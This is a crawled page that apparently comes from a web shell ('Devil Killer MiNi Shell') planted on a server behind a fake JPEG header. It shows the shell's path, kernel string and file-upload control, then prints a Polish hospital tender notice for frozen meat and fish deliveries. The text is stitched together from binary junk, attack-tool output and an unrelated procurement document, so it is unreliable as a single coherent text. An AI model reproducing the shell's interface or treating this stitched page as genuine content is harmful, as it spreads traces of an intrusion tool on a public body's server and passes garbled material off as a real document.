JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210719/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210719/0011940201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00119402 z dnia 2021-07-19</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa mrożonych produktów spożywczych mięsnych dla SPSK im prof. A. Grucy CMKP w Otwocku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY SZPITAL KLINICZNY IM. PROF. ADAMA GRUCY CENTRUM MEDYCZNEGO KSZTAŁCENIA PODYPLOMOWEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000290156</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Konarskiego 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">227794031 wew. 217</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@spskgruca.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spskgrucy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zakład Opieki Zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa mrożonych produktów spożywczych mięsnych dla SPSK im prof. A. Grucy CMKP w Otwocku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-570eb995-e881-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00119402</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://spskgruca.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://spskgruca.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, przekazywane są w formie elektronicznej lub postaci elektronicznej za<br/>pośrednictwem Platformy Portal eZamawiajacy ,System jest dostępny pod adresem: https://spskgruca.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Samodzielny Publiczny Szpital Kliniczny im.<br/>Prof. A. Grucy CMKP, adres: ul. Konarskiego 13, 05-400 Otwock<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: iod@spskgruca.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy PZP 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP. przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy PZP, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.26.76.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> dostawa mrożonych produktów spożywczych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15896000-5 - Produkty głęboko mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji:<br/>a) Zamawiający zobowiązuje się do zrealizowania zamówienia na poziomie minimum 20%<br/>wartości umowy<br/>b) Zamawiający zastrzega możliwość skorzystania z prawa opcji w zakresie przedmiotu<br/>zamówienia opisanego w formularzu cenowym stanowiącym załącznik nr 1A do swz, poprzez<br/>zwiększenie każdej z pozycji o maksimum 50%, z zastrzeżeniem, że łączna wartość umowy nie<br/>może zostać przekroczona. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) Spełniają warunki udziału w postępowaniu dotyczące: a) uprawnień do prowadzenia działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów<br/>Dla uznania, że Wykonawca spełnia powyższy warunek zobowiązany jest wykazać się<br/>posiadaniem aktualnej decyzji lub zaświadczenia o wpisie do rejestru podmiotów<br/>nadzorowanych przez właściwego inspektora sanitarnego potwierdzające możliwość<br/>prowadzenia działalności w zakresie produkcji i/lub obrotu środkami spożywczymi i/lub<br/>materiałami do kontaktu z żywnością.<br/>b) zdolności technicznej lub zawodowej<br/>1) Dla uznania, że Wykonawca spełnia powyższy warunek Zamawiający żąda, aby Wykonawca<br/>wykazał, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy to w tym okresie zrealizował min. jedno zamówienie<br/>obejmujące swym zakresem sukcesywną dostawy mrożonych produktów spożywczych: przez<br/>okres co najmniej 6 miesięcy dla podmiotów leczniczych lub szkół i innych placówek<br/>oświatowych lub domów opieki publicznych i niepublicznych lub uzdrowisk lub żłobków i innych<br/>placówek opiekuńczych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">WYKAZ PODMIOTOWYCH ŚRODKÓW DOWODOWYCH ORAZ INNYCH<br/>DOKUMENTÓW LUB OŚWIADCZEŃ POTWIERDZAJĄCYCH SPEŁNIENIE WARUNKÓW UDZIAŁU<br/>W POSTĘPOWANIU ORAZ WYKAZANIE BRAKU PODSTAW DO WYKLUCZENIA<br/>Wykaz oświadczeń składanych wraz z ofertą:<br/>1) Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykazaniu braku podstaw do<br/>wykluczenia z postępowaniu - wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>a) Oświadczenie stanowi wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia<br/>warunki udziału w postępowaniu odpowiednio na dzień składania ofert<br/>b) Oświadczenie stanowi wstępne potwierdzenie, że podmiot udostępniający zasoby nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu, w zakresie w jakim wykonawca powołuje<br/>się na jego zasoby odpowiednio na dzień składania ofert<br/>c) Oświadczenie, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienie. Oświadczenie ma potwierdzać spełnienie warunków udziału w postępowaniu, w zakresie , w którym<br/>każdy z wykonawców wykazuje spełnienie tych oraz wykazać brak podstaw do wykluczenia każdego z<br/>wykonawców.<br/>d) Oświadczenie składa podmiot udostępniający zasoby.<br/>Oświadczenie ma potwierdzać spełnienie warunków udziału w postępowaniu w zakresie w jakim<br/>wykonawca powołuje się na zasoby danego podmiotu oraz wykazać brak podstaw do wykluczenia<br/>podmiotu.<br/>2) Zamawiający informuje, że Wykonawca może wykorzystać dokument złożony w odrębnym<br/>postępowaniu o udzielenie zamówienia, jeżeli potwierdzi, że informacje w nim zawarte pozostają<br/>prawidłowe.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia<br/>oświadczenia, o którym mowa w art. 117 ust. 4 ustawy PZP. Z treści oświadczenia winno<br/>jednoznacznie wynikać, które roboty budowlane, dostawy, usługi wykonają poszczególni wykonawcy w<br/>odniesieniu do warunków udziału w postępowaniu określonych w pkt VI.1 pkt 1) ppkt VI 1. a) b)SWZ do<br/>realizacji, których zdolności są wymagane- wg wzoru stanowiącego załącznik nr 2A do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnienie warunków udziału w postępowaniu:<br/>W zakresie posiadania odpowiednich kompetencji lub uprawnień do prowadzenia określonej<br/>działalności zawodowej<br/>1) Decyzja lub zaświadczenie o wpisie do rejestru podmiotów nadzorowanych przez właściwego<br/>inspektora sanitarnego, potwierdzające możliwość prowadzenia działalności w zakresie produkcji i/lub<br/>obrotu środkami spożywczymi i/lub materiałami do kontaktu z żywnością.<br/>2.1.2. W zakresie zdolności technicznej lub zawodowej<br/>1) Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane - wzór stanowi załącznik<br/>nr 3 do SWZ.<br/>2) Dowody określające, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego dostawy były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od siebie nie jest w stanie uzyskać tych<br/>dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych<br/>nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający w celu potwierdzenia zgodności zaoferowanych dostaw/usług/robót<br/>budowlanych żąda złożenia wraz z ofertą wymienionych poniżej przedmiotowych środków<br/>dowodowych:<br/>1) Karty produktów<br/>2) Oświadczenie o wdrożeniu i stosowaniu HACCP oraz GHP i GMP treść oświadczenia zawarta<br/>w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ.<br/>3) Oświadczenie, że zakład produkcyjny został odebrany i jest kontrolowany przez właściwy<br/>organ Państwowej Inspekcji Sanitarnej treść oświadczenia zawarta w formularzu ofertowym<br/>stanowiącym załącznik nr 1 do SWZ.<br/>4) Oświadczenie o posiadaniu aktualnych badań do celów sanitarno-epidemiologicznych u<br/>pracowników (wszyscy pracownicy posiadają aktualne badania do celów sanitarnoepidemiologicznych)<br/>treść oświadczenia zawarta w formularzu ofertowym stanowiącym<br/>załącznik nr 1 do SWZ.<br/>5) Oświadczenie, że transport produktów żywnościowych będzie odbywał się przy zachowaniu<br/>odpowiednich reżimów sanitarnych dla przewozu żywności zgodnie z ustawą z dnia 25 sierpnia<br/>2006 r o bezpieczeństwie żywności i żywienia (Dz.U. 2010 Nr 136, poz. 914) oraz, że środki<br/>transportu zostały dopuszczone do przewozu żywności przez właściwy organ Państwowej<br/>Inspekcji Sanitarnej treść oświadczenia zawarta w formularzu ofertowym stanowiącym załącznik<br/>nr 1 do SWZ.<br/>6) Oświadczenie, że środki spożywcze są zgodne z wymaganiami następujących przepisów<br/>prawnych:<br/>• Ustawa z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia*<br/>• Rozporządzenie Parlamentu Europejskiego i Rady nr 852/2004 z dnia 29 kwietnia 2004r w<br/>sprawie higieny środków spożywczych *<br/>• Rozporządzenie Ministra Zdrowia z dnia 23 grudnia 2014r w sprawie znakowania<br/>poszczególnych rodzajów środków spożywczych*<br/>• Rozporządzenie Parlamentu Europejskiego i Rady (UE) nr 1169/2011 z dnia 25 października<br/>2011r w sprawie przekazywania konsumentom informacji na temat żywności*<br/>• Rozporządzenie Ministra Zdrowia z dnia 22 listopada 2010r. w sprawie dozwolonych substancji<br/>dodatkowych*<br/>• Rozporządzenie Komisji (WE) nr 2073/2005 z dnia 15 listopada 2005r w sprawie kryteriów<br/>mikrobiologicznych dotyczących środków spożywczych*<br/>• Rozporządzenie Komisji (WE) 1881/2006 z dnia 19 grudnia 2006r ustalające najwyższe<br/>dopuszczalne poziomy niektórych zanieczyszczeń w środkach spożywczych*<br/>• Rozporządzenie Parlamentu Europejskiego i Rady (WE) nr 1333/2008 z dnia 16 grudnia<br/>2008r. w sprawie dodatków do żywności*<br/>• Przepisów dot. Substancji i preparatów chemicznych**Przepisami dot. produktów biobójczych**<br/>• Przepisami z obszaru BHP dot. Stosowania substancji i preparatów chemicznych**<br/>• Przepisów dot. Materiałów i wyrobów przeznaczonych do kontaktu z żywnością.**<br/>*oznacza aktualne wydanie normy lub przepisu prawnego<br/>** oznacza aktualne przepisy prawne<br/>(treść oświadczenia zawarta w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) Karty produktów<br/>2) Oświadczenie o wdrożeniu i stosowaniu HACCP oraz GHP i GMP treść oświadczenia zawarta<br/>w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ.<br/>3) Oświadczenie, że zakład produkcyjny został odebrany i jest kontrolowany przez właściwy<br/>organ Państwowej Inspekcji Sanitarnej treść oświadczenia zawarta w formularzu ofertowym<br/>stanowiącym załącznik nr 1 do SWZ.<br/>4) Oświadczenie o posiadaniu aktualnych badań do celów sanitarno-epidemiologicznych u<br/>pracowników (wszyscy pracownicy posiadają aktualne badania do celów sanitarnoepidemiologicznych)<br/>treść oświadczenia zawarta w formularzu ofertowym stanowiącym<br/>załącznik nr 1 do SWZ.<br/>5) Oświadczenie, że transport produktów żywnościowych będzie odbywał się przy zachowaniu<br/>odpowiednich reżimów sanitarnych dla przewozu żywności zgodnie z ustawą z dnia 25 sierpnia<br/>2006 r o bezpieczeństwie żywności i żywienia (Dz.U. 2010 Nr 136, poz. 914) oraz, że środki<br/>transportu zostały dopuszczone do przewozu żywności przez właściwy organ Państwowej<br/>Inspekcji Sanitarnej treść oświadczenia zawarta w formularzu ofertowym stanowiącym załącznik<br/>nr 1 do SWZ.<br/>6) Oświadczenie, że środki spożywcze są zgodne z wymaganiami następujących przepisów<br/>prawnych:<br/>• Ustawa z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia*<br/>• Rozporządzenie Parlamentu Europejskiego i Rady nr 852/2004 z dnia 29 kwietnia 2004r w<br/>sprawie higieny środków spożywczych *<br/>• Rozporządzenie Ministra Zdrowia z dnia 23 grudnia 2014r w sprawie znakowania<br/>poszczególnych rodzajów środków spożywczych*<br/>• Rozporządzenie Parlamentu Europejskiego i Rady (UE) nr 1169/2011 